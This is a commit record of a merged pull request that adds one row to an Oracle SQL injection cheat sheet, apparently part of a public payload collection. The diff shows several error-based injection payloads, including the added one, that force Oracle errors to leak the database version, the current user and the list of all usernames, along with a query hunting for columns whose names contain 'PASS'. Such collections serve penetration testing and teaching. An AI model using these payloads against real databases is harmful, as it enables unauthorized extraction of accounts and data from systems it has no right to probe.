Merge pull request #434 from jaxBCD/patch-1

Update Oracle Sql injection.md add sql error
2026-01-02 07:49:47 -08:00 · 2021-10-04 17:54:05 +02:00
parent 3b5f23b4ea 11dc7bc2c2
commit acca37dc79
1 changed files with 2 additions and 0 deletions
--- a/Injection/OracleSQL
+++ b/Injection/OracleSQL
@@ -58,6 +58,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
 | Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual |
 | Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
+| SQL Error             | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) |
+

 ## Oracle SQL Blind